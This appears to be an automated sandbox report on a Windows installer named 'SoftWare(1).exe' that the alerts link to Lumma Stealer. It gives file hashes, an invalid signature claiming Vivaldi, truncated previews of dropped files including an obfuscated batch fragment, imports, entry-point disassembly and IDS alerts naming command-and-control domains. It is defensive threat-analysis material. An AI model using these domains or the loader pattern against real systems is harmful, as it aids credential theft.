                                                                                                                                                                                                                                    Preview:.c.........................5M.j.P...p..L$.........5M.....5.5M.....!5.5M.3.........t .......|$........t.98t.F;.r.|$L;.....................P..v.........D$........T......;.t.R......D$..@...j.j.@P..........=a#M....x...j..............D....>....D$.....I..L$L.G..6.dv....j.j..A...@..L$T@P.V......@........D$...P......[.....`...........=.)M....r.....)M...)M..0.t$..A+....T5M.........K....~....d....F...P..u...D$.....M.......$....hH.K...$.....$.........$.........b~..j...$......3M.P..$....P......$........v...$.......h`.K...$.....$..........$......~..j...$......3M.P..$....P.h.....$.....O....t$...$.....v..D...h..K...$.....$..........$.....}..j...$......3M.P..$....P.......$.........D$....`....j.j..@.@P....Q.L$ .`...........$.............Q.........(M...M.....t$.....r...................3..............L$t.D$h.....D$T..I..D$..D$X.D$\.D$`............8C...t$t.L$ .D$(.....6. ....v....FX...v.....s....T$..J.Q.................z...D$........L$t....L$..P....f.x....&....F.....D$...f.y.3ty..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (990), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):26997
                                                                                                                                                                                                                                    Entropy (8bit):5.093850281877817
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:wQlRndoxJpxJP3sYaFrNVOGYrLgF4WdDy3Bv2Y:wqRndyJvN8YurNVoLgF4WdUZ
                                                                                                                                                                                                                                    MD5:40BAF121A5D54165FB1FF0D78F2A9756
                                                                                                                                                                                                                                    SHA1:03D58E5B52C834EEFE259212146C85569C8EA1D6
                                                                                                                                                                                                                                    SHA-256:56A066FA2823DEC314621F7C95C162723BAB1FE2416C292D10BADC91353EFF35
                                                                                                                                                                                                                                    SHA-512:98503116E8EFD077EBA0530D82167230606D3F1050B67D88D95E8086201919F491BA328C0CCFE8858DD34B75E5D54B2156F3F25277B305E5579994BA8F0DDEEB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:Set Year=o..OOConfidential-Prescribed-Recommendations-Annotation-Egg-Algorithm-Nightlife-Committed-..ubRetrieved-Administration-Killer-Tabs-Listprice-Effort-Variance-Denied-Weights-..YymMVitamins-Mi-Tested-Himself-Exhaust-Halloween-Km-Dicks-Proceeds-..XMPoultry-Ja-Edt-..lZaPermalink-..aTRCGoat-Railroad-Operation-Meets-Membership-Bo-Parish-Offshore-..KiDistance-Revenge-Seed-Pichunter-Moderators-Medication-..DAAToo-Laundry-Goal-Syndrome-Ensure-Modifications-..CmSSupervisors-Wheat-Narrative-Grace-Committed-Cookies-..SyAtm-Hawaiian-Beach-Educated-Subsidiaries-Experiments-Running-..Set Park=7..jNuJCloth-Move-Manga-Downloads-Muscle-Netherlands-Activity-Management-..tadWSalary-Rouge-Immediately-Resolve-Tech-Feat-..ENSluts-Detailed-Successful-Sam-Activists-Ladder-..GUFJAmendment-Bunny-Monitor-Hear-D-..SsLBee-Priced-..ZPZFirewall-Menu-Namespace-..Set Handheld=A..EqXIncreasingly-Advise-..gdKyLocked-Mike-Comparing-Disk-Subscriptions-O-Paris-Experienced-Vacuum-..dGxAppointed-..GNaBCoin-..bhHAAdmin
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (990), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):26997
                                                                                                                                                                                                                                    Entropy (8bit):5.093850281877817
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:wQlRndoxJpxJP3sYaFrNVOGYrLgF4WdDy3Bv2Y:wqRndyJvN8YurNVoLgF4WdUZ
                                                                                                                                                                                                                                    MD5:40BAF121A5D54165FB1FF0D78F2A9756
                                                                                                                                                                                                                                    SHA1:03D58E5B52C834EEFE259212146C85569C8EA1D6
                                                                                                                                                                                                                                    SHA-256:56A066FA2823DEC314621F7C95C162723BAB1FE2416C292D10BADC91353EFF35
                                                                                                                                                                                                                                    SHA-512:98503116E8EFD077EBA0530D82167230606D3F1050B67D88D95E8086201919F491BA328C0CCFE8858DD34B75E5D54B2156F3F25277B305E5579994BA8F0DDEEB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:Set Year=o..OOConfidential-Prescribed-Recommendations-Annotation-Egg-Algorithm-Nightlife-Committed-..ubRetrieved-Administration-Killer-Tabs-Listprice-Effort-Variance-Denied-Weights-..YymMVitamins-Mi-Tested-Himself-Exhaust-Halloween-Km-Dicks-Proceeds-..XMPoultry-Ja-Edt-..lZaPermalink-..aTRCGoat-Railroad-Operation-Meets-Membership-Bo-Parish-Offshore-..KiDistance-Revenge-Seed-Pichunter-Moderators-Medication-..DAAToo-Laundry-Goal-Syndrome-Ensure-Modifications-..CmSSupervisors-Wheat-Narrative-Grace-Committed-Cookies-..SyAtm-Hawaiian-Beach-Educated-Subsidiaries-Experiments-Running-..Set Park=7..jNuJCloth-Move-Manga-Downloads-Muscle-Netherlands-Activity-Management-..tadWSalary-Rouge-Immediately-Resolve-Tech-Feat-..ENSluts-Detailed-Successful-Sam-Activists-Ladder-..GUFJAmendment-Bunny-Monitor-Hear-D-..SsLBee-Priced-..ZPZFirewall-Menu-Namespace-..Set Handheld=A..EqXIncreasingly-Advise-..gdKyLocked-Mike-Comparing-Disk-Subscriptions-O-Paris-Experienced-Vacuum-..dGxAppointed-..GNaBCoin-..bhHAAdmin
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:DOS executable (COM)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60416
                                                                                                                                                                                                                                    Entropy (8bit):6.718975113840313
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:lSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdn8:lSpQSAU4CE0Imb8
                                                                                                                                                                                                                                    MD5:614AAE2133A3887EBA07AD6C2FF85000
                                                                                                                                                                                                                                    SHA1:51B67FF90FE9D78512AB5F1611F6E735BC86BD81
                                                                                                                                                                                                                                    SHA-256:0CD0978300D395AE6F03DB8C14C98852361E1922A1C43A13D1E8908CC601ED76
                                                                                                                                                                                                                                    SHA-512:E95F83D5CB70380FEE49A653C4B5005269F70552502FD86C8F6EDA1FCFBD2A149D7F25FE50504CCE4AE99EE63AFD2B1C1085430B2D53A3B1D59C98F2EAC4ECCF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:.z..M.....E.Q...P.+..YY..t..E.E.3.j..].E.Y..3..].3.E.A.E.f.E..E.j..p..E.PQ.E.P.E.j.P.........u.8E.t..E...P....3.....E.#E..}..t..M...P.....M.3.[.m.....]..U..V.u....w0..u.F...f.....t V.f...Y..t.Vj..5.#M...p.I...t....s.........3.^]..U..Qj..u.QQ...u..u.P.\......j..m........]..U..Qj..u.QQ...u..u.P.0......j..i........]..U....SV.u...t..]...t..>.u..E...t.3.f..3.^[..].W.u..M......E......u..M...t....f..3.G.....E.P...P..*..YY..t@.}....~';_.|%3.9E....P.u..w.Vj..w.....I..}..u.;_.r..~..t(....13.9E....3.P.u..E.GWVj..p.....I...u..7........*....}..t..M...P......_.1.....U..j..u..u..u.........]..U....S.].W.}...u...t..E...t.. .3..z.E...t....V......v....j.^.0......S.u..M..s....E.3.9.....u]f.E......f;.v6..t...t.WVS.........t...j*^.0.}..t..M.P......^_[..]..t...t_...E...t.........M..u.QVWSj..M.QV.p.....I....t.9u.u..E...t......0.I...zu...t...t.WVS.Y..........j"^.0......l.....U..j..u..u..u..u.........]..U..4.M.VW...||.u.....j X+.....#.E.;.s...<2..;.t..9.t.A;.u.+.;...........+...
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):79203
                                                                                                                                                                                                                                    Entropy (8bit):7.024302557408604
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:oWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:oWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                    MD5:731509D0001F79842322B93BD1407A42
                                                                                                                                                                                                                                    SHA1:F71DFBE4BFC58869C8C2FB26D6081A65C4FE8CEF
                                                                                                                                                                                                                                    SHA-256:FFF7062C429DB4BB1876EB748D4B362E6BF56FBB81552972024A3BC09E1E1A44
                                                                                                                                                                                                                                    SHA-512:56AB1787688B2991FE0F1928875455112158431170D544E7728E8194E247DFCBE8829EACC547601B61F64B36D86C0845D1029B00DBD055B4CBC46D0E1C20DB95
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................?.......................................................................................................................................................................................................................................................?..................................................................(... ...@........................................................}..............f...]......g.............m...^..............h...g..............t......f...a...........s......
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):104448
                                                                                                                                                                                                                                    Entropy (8bit):5.432963830676052
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:ZbOU7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqC:zimuzaAwusPdKaz
                                                                                                                                                                                                                                    MD5:ADD6E78F067A3E3C77B0A9089E871634
                                                                                                                                                                                                                                    SHA1:7004977CACE878377726630F4A7902FAACF13FBF
                                                                                                                                                                                                                                    SHA-256:E7C92175950B870370A0876FC459FD9F3EDB8720C3262B35A4B537676EA2C84B
                                                                                                                                                                                                                                    SHA-512:2257FB5E242EA8545780133E52ED723FCC96A217194D8D1D694EBF59B19A55172609DCF627836EBF7A5A49191FC8A2BA0389BD2BE34DCD56D4BD1202A8B7666E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:e.=...F``.?./...f.=..#.&..?.5SmT4.<.W.....?R.z...<. ..(.?....vY.<.....k.?p.Y....=..y....?.8.'...<.Ku.C..?j...<{.=.2.<.5.?....d.=.....x.?."a....=.@.ic..?.%.[.9.=.......?kR..F..<..6D.C.?..._.<.5..Z..?..k.*.=....3..?.*+xi(.<..G.&..?..r.ly.=.:..3S.?z....j.<...[..?..'....<.;!....?.h.....=...<...?...:...<....sd.?....3..=..?....?{.!m.B.<.<>....?..*..2.=.....2.?cM.yoG.=.V..sw.?8K...$.<....}..?C..l...<......?.-...<.'...F.?....{.<..$.R..?..)B..<..#....?.......<...c...?? ..~..<....F].?...&...=..../..?94...E.<.?.T9..?9*...).<.l?.e/.?.B6.!F.=.u0w.u.?.M...=..k`(..?.......<.4.=...?Kp.....=.G".zI.?$.}Tw5.<....[..?....b.<..K.a..?.aF.7..=.V.j...?.T...y.<.R..e.?M]-..e.<.$..[..?3....<.....?..QZo..=.n..<.?1-.I.x.<.f.....?.I..]..=...O...?...x...=..#.$..?.n.z...=..) .].?....h..<..'.7..?y]h....=..Yg...?..S.c..<.b}....?...$..=.;..@.?OD...).=....=e.?:Q.]D\.<.......?FnH.AY.<.."...?.)B.p..=.)R.Q..?..{...<..L..0.?.U...<..d.N{.?...c.1.=.f..k..?iO...).=...m...?.....R.=.l[..].?..$.i.=.w/.d
                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):7.970596137437225
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:SoftWare(1).exe
                                                                                                                                                                                                                                    File size:1'229'340 bytes
                                                                                                                                                                                                                                    MD5:8e7a36f81e75c2d3867657fe3fe09206
                                                                                                                                                                                                                                    SHA1:64d91ff851907825620a24e77bb7c1ddf9e84c4d
                                                                                                                                                                                                                                    SHA256:06eee6980c796d8b091a20d06bc1d77bff77601622ac0cd9721dd1b4aefc0f33
                                                                                                                                                                                                                                    SHA512:eae3d62b60bbd293cb1ddcda87b2d2ef8639ec798b1ec49aa8305151c59e7c6ed134745b5b5e800a79aaa77a1b248f00fb65633fa357b1a47aff125c5c0e84d2
                                                                                                                                                                                                                                    SSDEEP:24576:d6XGZx0sb6KhM79Z/Vie3jPHSzQKMrAPbsO1T3b+iEA9tl9Tz5xm5H:c2ZxNz+7v/VdzhKMHO1TZEiVxm5H
                                                                                                                                                                                                                                    TLSH:764523974DFE10B3EAA32FB8606416225F7AF202487D1445625AAF8C2D30705AF77B63
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...^...B...8.....
                                                                                                                                                                                                                                    Icon Hash:06ece084ca1ada0c
                                                                                                                                                                                                                                    Entrypoint:0x4038af
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                    Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                    • 10/10/2023 03:35:44 18/12/2026 11:17:34
                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                    • CN=Vivaldi Technologies AS, O=Vivaldi Technologies AS, STREET=M\xf8lleparken 6, L=Oslo, S=Oslo, C=NO, OID.1.3.6.1.4.1.311.60.2.1.3=NO, SERIALNUMBER=912 309 975, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                    Thumbprint MD5:8E075E67B57EDAB05DE2ED5632BA0C6F
                                                                                                                                                                                                                                    Thumbprint SHA-1:F7A524AD45E585F8B71E6204B2583714151A08EF
                                                                                                                                                                                                                                    Thumbprint SHA-256:94BACA5F849BD741FFF1A7F30B4480CBC4541321D3A543551AEA97B7D5DC72B1
                                                                                                                                                                                                                                    Serial:0E6194E2779D531F896950FF
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                    call dword ptr [00409030h]
                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                    call dword ptr [004090B4h]
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    call dword ptr [004092C0h]
                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                    mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                    call 00007FF9D08F990Bh
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                                                                    mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    push 0040A264h
                                                                                                                                                                                                                                    call dword ptr [00409184h]
                                                                                                                                                                                                                                    push 0040A24Ch
                                                                                                                                                                                                                                    push 00476AA0h
                                                                                                                                                                                                                                    call 00007FF9D08F95EDh
                                                                                                                                                                                                                                    call dword ptr [004090B0h]
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    mov edi, 004CF0A0h
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    call 00007FF9D08F95DBh
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    call dword ptr [00409134h]
                                                                                                                                                                                                                                    cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                    mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                                                    jne 00007FF9D08F6EDAh
                                                                                                                                                                                                                                    push 00000022h
                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                    mov eax, 004CF0A2h
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    call 00007FF9D08F92B1h
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    call dword ptr [00409260h]
                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                    jmp 00007FF9D08F6F63h
                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                    cmp ax, bx
                                                                                                                                                                                                                                    jne 00007FF9D08F6EDAh
                                                                                                                                                                                                                                    add esi, 02h
                                                                                                                                                                                                                                    cmp word ptr [esi], bx
                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                    • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x2f0a6.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1293940x2e88.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .rsrc0x1000000x2f0a60x2f20037e37df6e822b0fcb4c465ebff8bdb7aFalse0.9557308935676393data7.810026548464792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0x1300000xfd60x10005b331f8bfda5f87ec3bf2f7f3fd47660False0.56787109375data5.307545916589835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x1002680x28728PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.976308609783186
                                                                                                                                                                                                                                    RT_ICON0x1289900x4997PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.994426455756675
                                                                                                                                                                                                                                    RT_ICON0x12d3280x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.4612932604735883
                                                                                                                                                                                                                                    RT_ICON0x12e4500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.598404255319149
                                                                                                                                                                                                                                    RT_DIALOG0x12e8b80x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                    RT_DIALOG0x12e9b80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                    RT_DIALOG0x12ead40x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                    RT_GROUP_ICON0x12eb340x3edataEnglishUnited States0.8225806451612904
                                                                                                                                                                                                                                    RT_VERSION0x12eb740x25cdataEnglishUnited States0.5198675496688742
                                                                                                                                                                                                                                    RT_MANIFEST0x12edd00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                    2024-12-27T22:57:31.067723+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.5654701.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:31.291898+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.5519071.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:31.612658+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.5526551.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:31.923517+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.5533981.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:32.234745+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.5537591.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:32.456891+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.5513011.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:32.765384+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.5525821.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:33.072450+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.5611901.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-27T22:57:35.008570+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549752104.102.49.254443TCP
                                                                                                                                                                                                                                    2024-12-27T22:57:35.771895+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549752104.102.49.254443TCP
                                                                                                                                                                                                                                    2024-12-27T22:57:37.475591+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549758104.21.66.86443TCP
                                                                                                                                                                                                                                    2024-12-27T22:57:38.254781+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549758104.21.66.86443TCP
